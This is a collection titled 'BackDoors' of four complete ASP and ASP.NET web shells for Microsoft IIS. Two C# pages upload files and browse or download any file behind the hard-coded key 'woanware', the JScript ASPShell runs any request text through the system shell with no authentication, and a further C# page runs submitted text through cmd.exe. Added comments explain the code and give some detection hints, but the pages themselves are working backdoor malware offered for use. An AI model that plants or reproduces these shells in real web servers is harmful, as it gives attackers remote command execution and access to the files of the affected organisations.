BackDoors
<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
// Shared secret compared with the "authkey" request parameter by the handlers below.
// It is a hard-coded plaintext constant, so anyone who can read this file knows it;
// the literal is also a stable string for content-based detection of this page.
private const string AUTHKEY = "woanware";
// Static HTML prologue written before each response body in Page_Load.
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
// Static HTML epilogue written after each response body in Page_Load.
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
/// Entry point of the upload page. A request whose "authkey" parameter is missing
/// or differs from AUTHKEY only receives the upload form. With a matching key,
/// operation=upload dispatches to UploadFile, any other operation value yields
/// "Unknown operation", and a request without an operation re-renders the form.
/// </summary>
/// <param name="sender">Event source; not read by this handler.</param>
/// <param name="e">Event data; not read by this handler.</param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
// Request.Params merges query string, form fields, cookies and server variables,
// so the key may arrive by any of them. A key sent in the query string would be
// expected to show up in the web server's request log.
if (Request.Params["authkey"] == null)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
// Wrong key: same response as a missing key, so the page reveals no difference
// between the two cases.
if (Request.Params["authkey"] != AUTHKEY)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "upload")
{
// The only state-changing path: UploadFile writes the posted file to disk.
Response.Write(HEADER);
Response.Write(this.UploadFile());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
// Any exception message is returned to the client inside the HTML wrapper.
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
/// Saves the single posted file into the directory that holds this page.
/// Repeats the AUTHKEY check, then copies the upload to disk under the file-name
/// part of the client-supplied name. Nothing here restricts the extension or the
/// content, and FileMode.Create replaces an existing file of the same name.
/// Defender note: the observable effect is a new or overwritten file in a web
/// content directory, created by the web application's own process.
/// </summary>
/// <returns>
/// "No file selected" or "File uploaded" as status text, an empty string when the
/// key check fails, or the full exception text (ex.ToString()) on error.
/// </returns>
private string UploadFile()
{
try
{
if (Request.Params["authkey"] == null)
{
return string.Empty;
}
if (Request.Params["authkey"] != AUTHKEY)
{
return string.Empty;
}
// Exactly one file part is required; zero or several are rejected alike.
if (Request.Files.Count != 1)
{
return "No file selected";
}
HttpPostedFile httpPostedFile = Request.Files[0];
int fileLength = httpPostedFile.ContentLength;
byte[] buffer = new byte[fileLength];
// Single Read call whose return value is ignored: a short read would leave the
// rest of the buffer zero-filled and still be written out in full.
httpPostedFile.InputStream.Read(buffer, 0, fileLength);
// Target directory is derived from the physical path of the requested page.
FileInfo fileInfo = new FileInfo(Request.PhysicalPath);
// Path.GetFileName drops directory components from the client-supplied name, so
// the write stays in this page's directory; the name itself is otherwise unchecked.
using (FileStream fileStream = new FileStream(Path.Combine(fileInfo.DirectoryName, Path.GetFileName(httpPostedFile.FileName)), FileMode.Create))
{
fileStream.Write(buffer, 0, buffer.Length);
}
return "File uploaded";
}
catch (Exception ex)
{
// The complete exception text, including the stack trace, goes back to the caller.
return ex.ToString();
}
}
/// <summary>
/// Builds the HTML upload form: a multipart POST to "?operation=upload" carrying a
/// text field for the key and a file field.
/// </summary>
/// <returns>The form markup as a string.</returns>
private string GetUploadControls()
{
string temp = string.Empty;
temp = "<form enctype=\"multipart/form-data\" action=\"?operation=upload\" method=\"post\">";
// NOTE(review): the field is named "authKey" while the server code reads "authkey";
// presumably the request collection matches names case-insensitively - confirm.
temp += "<br>Auth Key: <input type=\"text\" name=\"authKey\"><br>";
temp += "<br>Please specify a file: <input type=\"file\" name=\"file\"></br>";
temp += "<div><input type=\"submit\" value=\"Send\"></div>";
temp += "</form>";
return temp;
}
</script>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
<%@ Language = "JScript" %>
<%
/*
ASPShell - web based shell for Microsoft IIS
Copyright (C) 2007 Kurt Hanner
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
http://aspshell.sourceforge.net
*/
// Server-side command dispatcher of the page. "q" carries the command and "cd" the
// working directory tracked by the client; both are taken straight from the request,
// and no authentication or authorization check appears anywhere in this block.
var version = "0.2 (beta) [2007-09-29]";
var homepagelink = "http://aspshell.sourceforge.net";
var q = Request("q")();
var cd = Request("cd")();
if (q)
{
var command = "";
var output = "";
if (q.length == 0)
{
q = ":";
}
// Coerce the request value to a plain string before comparing.
command = "" + q;
if (command == "?")
{
// Built-in help text.
output = " ? this help page\n" +
" :sv all server variables\n" +
" <shell command> execute any shell command\n";
}
else if (command.toLowerCase() == ":sv")
{
// Dumps every entry of Request.ServerVariables as "name: value"; multi-line values
// are split and listed one item per line.
var sv = "";
var svvalue = "";
var esv = new Enumerator(Request.ServerVariables);
for (; !esv.atEnd(); esv.moveNext())
{
sv = esv.item();
output += sv;
output += ": ";
svvalue = "" + Request.ServerVariables(sv);
if (svvalue.indexOf("\n") >= 0)
{
output += "\n";
var svitems = svvalue.split("\n");
for (var i=0; i<svitems.length; i++)
{
if (svitems[i].length > 0)
{
output += " ";
output += svitems[i];
output += "\n";
}
}
}
else
{
output += svvalue;
output += "\n";
}
}
}
else if (command.toLowerCase() == ":cd")
{
// Reports the absolute path that "." resolves to on the server.
var fso = new ActiveXObject("Scripting.FileSystemObject");
output = fso.GetAbsolutePathName(".");
}
else if (/^:checkdir\s(.*)?$/i.test(command))
{
// Resolves a requested directory against "cd" (drive-rooted, drive-qualified or
// relative) and answers with the absolute path, or "fail" if it does not exist.
var newdirabs = "";
var newdir = RegExp.$1;
var fso = new ActiveXObject("Scripting.FileSystemObject");
var cdnorm = fso.GetFolder(cd).Path;
if (/^\\/i.test(newdir))
{
newdirabs = fso.GetFolder(cd).Drive + newdir;
}
else if (/^\w:/i.test(newdir))
{
newdirabs = fso.GetAbsolutePathName(newdir);
}
else
{
newdirabs = fso.GetAbsolutePathName(fso.GetFolder(cd).Path + "\\" + newdir);
}
output = fso.FolderExists(newdirabs) ? newdirabs : "fail";
}
else
{
// Everything that is not a built-in is handed to the operating system shell: the
// request text is concatenated unmodified into a "%comspec% /c" command line,
// prefixed with a drive switch and "cd" built from the client-supplied directory.
// Defender note: the host-side trace is a command interpreter started as a child
// of the web server's script host; the file-side trace is the "WScript.Shell"
// ProgID inside a page under the web root.
var changedir = "";
var currdrive = "";
var currpath = "";
var colonpos = cd.indexOf(":");
if (colonpos >= 0) {
currdrive = cd.substr(0, colonpos+1);
currpath = cd.substr(colonpos+1);
changedir = currdrive + " && cd \"" + currpath + "\" && ";
}
var shell = new ActiveXObject("WScript.Shell");
var pipe = shell.Exec("%comspec% /c \"" + changedir + command + "\"");
// Standard output is read to the end before standard error.
output = pipe.StdOut.ReadAll() + pipe.StdErr.ReadAll();
}
// The result is written to the response as-is, with no encoding applied here.
Response.Write(output);
}
else
{
var fso = new ActiveXObject("Scripting.FileSystemObject");
var currentpath = fso.GetAbsolutePathName(".");
var currentdrive = fso.GetDrive(fso.GetDriveName(currentpath));
var drivepath = currentdrive.Path;
%>
<html>
<head>
<meta HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<style><!--
body {
background: #000000;
color: #CCCCCC;
font-family: courier new;
font-size: 10pt
}
input {
background: #000000;
color: #CCCCCC;
border: none;
font-family: courier new;
font-size: 10pt;
}
--></style>
<script language="JavaScript"><!--
// Client-side state: entered commands, the position while browsing them, the
// directory shown in the prompt, and the directory of a pending "cd" check.
var history = new Array();
var historypos = 0;
var currentdirectory = "";
var checkdirectory = "";
// Sends "vars" as a form-encoded asynchronous POST to "url" and passes the response
// text to callbackFunction. The callback runs only for a completed request with
// status 200 and a non-empty body; every other outcome is ignored silently.
// Defender note: commands therefore travel in POST bodies rather than in the URL.
function ajax(url, vars, callbackFunction)
{
var request = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("MSXML2.XMLHTTP.3.0");
request.open("POST", url, true);
request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
request.onreadystatechange = function()
{
if (request.readyState == 4 && request.status == 200)
{
if (request.responseText)
{
callbackFunction(request.responseText);
}
}
}
request.send(vars);
}
// Prepares server output for display by chaining replacements and turning newlines
// into <br/> tags.
// NOTE(review): as shown, the first four replacements map a character to itself or
// to a plain space, which suggests HTML entities were lost when this page was
// extracted. As written the text is not HTML-escaped before outputAvailable assigns
// it to innerHTML.
function FormatOutput(txt)
{
return txt.replace(/</g, "<").replace(/>/g, ">").replace(/\x20/g, " ").replace(/\t/g, " ").replace(/\n/g, "<br/>");
}
// Document-wide keydown handler. Key code 13 (Enter) submits the input line, 38 and
// 40 (arrow up / down) step through the command history.
function KeyDownEventHandler(ev)
{
document.all("q").focus();
if (!ev)
{
ev = window.event;
}
// "keycode" is assigned without a declaration, so it becomes an implicit global.
if (ev.which)
{
keycode = ev.which;
}
else if (ev.keyCode)
{
keycode = ev.keyCode;
}
if (keycode == 13)
{
var cmd = document.all("q").value;
// Echo the prompt and the command into the output area first.
outputAvailable("[" + currentdirectory + "] " + cmd);
// A "cd <dir>" line is not executed; it is turned into a ":checkdir" request so
// the server validates the directory and the client keeps track of it.
if (/cd\s+(\"?)(.*)?\1\s*$/i.test(cmd))
{
checkdirectory = RegExp.$2;
ajax(document.URL, "q=" + encodeURIComponent(":checkdir " + RegExp.$2) + "&cd=" + encodeURIComponent(currentdirectory), checkdirAvailable);
history[history.length] = cmd;
historypos = history.length;
}
else if (cmd.length > 0)
{
// Any other non-empty line is posted as "q" together with the tracked directory.
ajax(document.URL, "q=" + encodeURIComponent(cmd) + "&cd=" + encodeURIComponent(currentdirectory), outputAvailable);
history[history.length] = cmd;
historypos = history.length;
}
}
else if (keycode == 38 && historypos > 0)
{
historypos--;
document.all("q").value = history[historypos];
}
else if (keycode == 40 && historypos < history.length)
{
historypos++;
// Stepping past the newest entry clears the input line.
if (historypos == history.length)
{
document.all("q").value = "";
}
else {
document.all("q").value = history[historypos];
}
}
}
// Appends a block of text to the output area, scrolls to the bottom of the page and
// clears the input line. The text is passed through FormatOutput and then assigned
// to innerHTML, so any markup that survives FormatOutput is parsed as HTML.
function outputAvailable(output)
{
var newelem = document.createElement("DIV");
newelem.innerHTML = FormatOutput(output);
document.all("output").appendChild(newelem);
var oldYPos = 0, newYPos = 0;
// "scroll" is declared but not read anywhere in this function.
var scroll = true;
// Scroll in steps of 100 until the vertical position stops increasing.
do
{
if (document.all)
{
oldYPos = document.body.scrollTop;
}
else
{
oldYPos = window.pageYOffset;
}
window.scrollBy(0, 100);
if (document.all)
{
newYPos = document.body.scrollTop;
}
else
{
newYPos = window.pageYOffset;
}
} while (oldYPos < newYPos);
document.all("q").value = "";
}
// Callback for a ":checkdir" request: "fail" (any letter case) prints a
// path-not-found message, any other answer becomes the new current directory.
function checkdirAvailable(output)
{
if (output.toLowerCase() == "fail")
{
outputAvailable("The system cannot find the path specified.");
}
else {
SetCurrentDirectory(output);
}
}
// Stores the directory reported by the server and shows it in the prompt label.
// The value is written through innerHTML without escaping.
function SetCurrentDirectory(output)
{
currentdirectory = output;
document.all("prompt").innerHTML = "[" + output + "]";
}
// Asks the server for its current directory with the ":cd" built-in and hands the
// answer to SetCurrentDirectory.
function GetCurrentDirectory()
{
ajax(document.URL, "q=" + encodeURIComponent(":cd"), SetCurrentDirectory);
}
// Runs from the body's onload attribute: focuses the input, installs the keydown
// handler and fetches the initial directory. This means a ":cd" POST is sent as
// soon as the page is opened.
function InitPage()
{
document.all("q").focus();
document.onkeydown = KeyDownEventHandler;
GetCurrentDirectory();
}
//--></script>
<title id=titletext>Web Shell</title>
</head>
<body onload="InitPage()">
<div id="output">
<div id="greeting">
ASPShell - Web-based Shell Environment Version <%=version%><br/>
Copyright (c) 2007 Kurt Hanner, <a href="<%=homepagelink%>"><%=homepagelink%></a><br/><br/>
</div>
</div>
<label id="prompt">[undefined]</label>
<input type="text" name="q" maxlength=1024 size=72>
</body>
</html>
<%
}
%>
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Text" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script language="c#" runat="server">
// Shared secret compared with the "authkey" request parameter in Page_Load. It is a
// hard-coded plaintext constant, and OutputList repeats the supplied key in every
// link it renders; the literal is a stable string for content-based detection.
private const string AUTHKEY = "woanware";
// Static HTML prologue written before each response body in Page_Load.
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
// Static HTML epilogue written after each response body in Page_Load.
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
/// Entry point of the file-browser page. Without an "authkey" parameter equal to
/// AUTHKEY the handler returns without writing anything. With a matching key,
/// operation=download calls DownloadFile, operation=list or no operation calls
/// OutputList, and any other value yields "Unknown operation".
/// </summary>
/// <param name="sender">Event source; not read by this handler.</param>
/// <param name="e">Event data; not read by this handler.</param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
// Missing or wrong key: no output is written by this handler, so an unkeyed
// request sees none of the page's functionality.
if (Request.Params["authkey"] == null)
{
return;
}
if (Request.Params["authkey"] != AUTHKEY)
{
return;
}
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "download")
{
Response.Write(HEADER);
Response.Write(this.DownloadFile());
Response.Write(FOOTER);
}
else if (Request.Params["operation"] == "list")
{
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
// No operation given: default to the directory listing.
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
// Any exception message is returned to the client inside the HTML wrapper.
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
/// Streams the file named by the "file" request parameter back as an attachment.
/// The path is used exactly as supplied: it is not confined to any directory, so
/// whatever File.Exists and Response.WriteFile can reach is returned.
/// Defender note: requests carry a server-side path in "file" together with
/// operation=download, and the response is application/octet-stream from a page.
/// </summary>
/// <returns>
/// A status string ("No file supplied", "File does not exist", "File downloaded")
/// or the full exception text (ex.ToString()) on error.
/// </returns>
private string DownloadFile()
{
try
{
if (Request.Params["file"] == null)
{
return "No file supplied";
}
string file = Request.Params["file"];
if (File.Exists(file) == false)
{
return "File does not exist";
}
// Discard the HEADER that Page_Load already wrote so only file bytes are sent.
Response.ClearContent();
Response.ClearHeaders();
Response.Clear();
Response.ContentType = "application/octet-stream";
// The header value is built by plain concatenation of the file name.
Response.AddHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(file));
Response.AddHeader("Content-Length", new FileInfo(file).Length.ToString());
Response.WriteFile(file);
Response.Flush();
// The response is closed here, before Page_Load writes the status string and FOOTER.
Response.Close();
return "File downloaded";
}
catch (Exception ex)
{
// The complete exception text, including the stack trace, goes back to the caller.
return ex.ToString();
}
}
/// <summary>
/// Renders an HTML listing for the directory named by the "directory" request
/// parameter, or for the first logical drive when none is given: the drives, a
/// parent link, the sub-directories and the files with their sizes.
/// Every link repeats the caller's "authkey" value in its query string, and paths
/// are appended to the markup without HTML or URL encoding.
/// Defender note: because the key rides in each link, it can be expected in the
/// web server's request log next to the directory= and file= paths.
/// </summary>
/// <returns>
/// The listing markup, "Directory does not exist", or the full exception text
/// (ex.ToString()) on error.
/// </returns>
private string OutputList()
{
try
{
StringBuilder response = new StringBuilder();
string dir = string.Empty;
if (Request.Params["directory"] == null)
{
string[] tempDrives = Environment.GetLogicalDrives();
if (tempDrives.Length > 0)
{
// The loop breaks on its first pass, so dir is always the first drive returned.
for (int index = 0; index < tempDrives.Length; index++)
{
try
{
dir = tempDrives[index];
break;
}
catch (IOException){}
}
}
}
else
{
// Caller-supplied path, used as given; nothing limits it to the web root.
dir = Request.Params["directory"];
}
if (Directory.Exists(dir) == false)
{
return "Directory does not exist";
}
// Output the auth key textbox. The asp:TextBox tag is appended as literal text to
// the returned string rather than declared in the page markup.
response.Append("<table><tr>");
response.Append(@"<td><asp:TextBox id=""txtAuthKey"" runat=""server""></asp:TextBox></td>");
response.Append("</tr><tr><td> <td></tr></table>");
// Output the available drives, one link per logical drive.
response.Append("<table><tr>");
response.Append("<td>Drives</td>");
string[] drives = Environment.GetLogicalDrives();
foreach (string drive in drives)
{
response.Append("<td><a href=");
response.Append("?directory=");
response.Append(drive);
response.Append("&authkey=" + Request.Params["authkey"]);
response.Append("&operation=list>");
response.Append(drive);
response.Append("</a></td>");
}
// Output the current path: a ".." link to the parent, or to dir itself when
// Directory.GetParent returns null.
response.Append("</tr></table><table><tr><td> </td></tr>");
response.Append("<tr><td>.. <a href=\"?directory=");
string parent = dir;
DirectoryInfo parentDirInfo = Directory.GetParent(dir);
if (parentDirInfo != null)
{
parent = parentDirInfo.FullName;
}
response.Append(parent);
response.Append("&authkey=" + Request.Params["authkey"]);
response.Append("&operation=list\">");
response.Append(parent);
response.Append("</a></td></tr></table><table>");
// Output the directories as links back to this page with operation=list.
System.IO.DirectoryInfo dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.DirectoryInfo dirs in dirInfo.GetDirectories("*.*"))
{
response.Append("<tr><td>dir <a href=\"?directory=" + dirs.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=list\">" + dirs.FullName + "</a></td></tr>");
}
// Output the files as operation=download links, followed by the size in bytes.
dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.FileInfo fileInfo in dirInfo.GetFiles("*.*"))
{
response.Append("<tr><td>file <a href=\"?file=" + fileInfo.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=download\">" + fileInfo.FullName + "</a></td><td>");
response.Append(fileInfo.Length);
response.Append("</td></tr>");
}
response.Append("</table>");
return response.ToString();
}
catch (Exception ex)
{
// The complete exception text, including the stack trace, goes back to the caller.
return ex.ToString();
}
}
</script>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
// Shared secret compared with the txtAuthKey form field in btnExecute_Click. It is a
// hard-coded plaintext constant, so anyone who can read this file knows it; the
// literal is also a stable string for content-based detection of this page.
private const string AUTHKEY = "woanware";
// Static HTML prologue written before the command output.
private const string HEADER = "<html>\n<head>\n<title>command</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
// Static HTML epilogue written after the command output.
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
/// Empty load handler; the page's only logic is in btnExecute_Click.
/// </summary>
/// <param name="sender">Event source; not used.</param>
/// <param name="e">Event data; not used.</param>
protected void Page_Load(object sender, EventArgs e)
{
}
/// <summary>
/// Click handler of the Execute button. When the txtAuthKey field equals AUTHKEY,
/// the text of txtCommand is passed to ExecuteCommand and the result is written
/// HTML-encoded inside a pre element; otherwise the handler returns without output.
/// </summary>
/// <param name="sender">Event source; not read by this handler.</param>
/// <param name="e">Event data; not read by this handler.</param>
protected void btnExecute_Click(object sender, EventArgs e)
{
// The key arrives as a form field of the postback, not as a URL parameter.
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
Response.Write(HEADER);
Response.Write("<pre>");
// Output is HTML-encoded before display, so markup in command output is shown as text.
Response.Write(Server.HtmlEncode(this.ExecuteCommand(txtCommand.Text)));
Response.Write("</pre>");
Response.Write(FOOTER);
}
/// <summary>
/// Runs the given text through "cmd.exe /c" and returns what the process writes to
/// standard output. The command string is appended to the arguments unmodified.
/// Defender note: the host-side trace is cmd.exe started as a child of the process
/// that hosts this page, with the submitted text on its command line.
/// </summary>
/// <param name="command">Command line text taken from the txtCommand form field.</param>
/// <returns>
/// The captured standard output, or the full exception text (ex.ToString()) when
/// starting or reading the process fails.
/// </returns>
private string ExecuteCommand(string command)
{
try
{
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = "cmd.exe";
processStartInfo.Arguments = "/c " + command;
// Only standard output is redirected; standard error is not captured here.
processStartInfo.RedirectStandardOutput = true;
// Required for stream redirection: the process is started directly, not via the shell API.
processStartInfo.UseShellExecute = false;
Process process = Process.Start(processStartInfo);
// The request blocks until the child closes its output; there is no timeout, and
// the Process object itself is never disposed.
using (StreamReader streamReader = process.StandardOutput)
{
string ret = streamReader.ReadToEnd();
return ret;
}
}
catch (Exception ex)
{
// The complete exception text, including the stack trace, goes back to the caller.
return ex.ToString();
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
<title>Command</title>
</head>
<body>
<form id="formCommand" runat="server">
<div>
<table>
<tr>
<td width="30">Auth Key:</td>
<td><asp:TextBox id="txtAuthKey" runat="server"></asp:TextBox></td>
</tr>
<tr>
<td width="30">Command:</td>
<td><asp:TextBox ID="txtCommand" runat="server" Width="820px"></asp:TextBox></td>
</tr>
<td> </td>
<td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td>
</tr>
</table>
</div>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->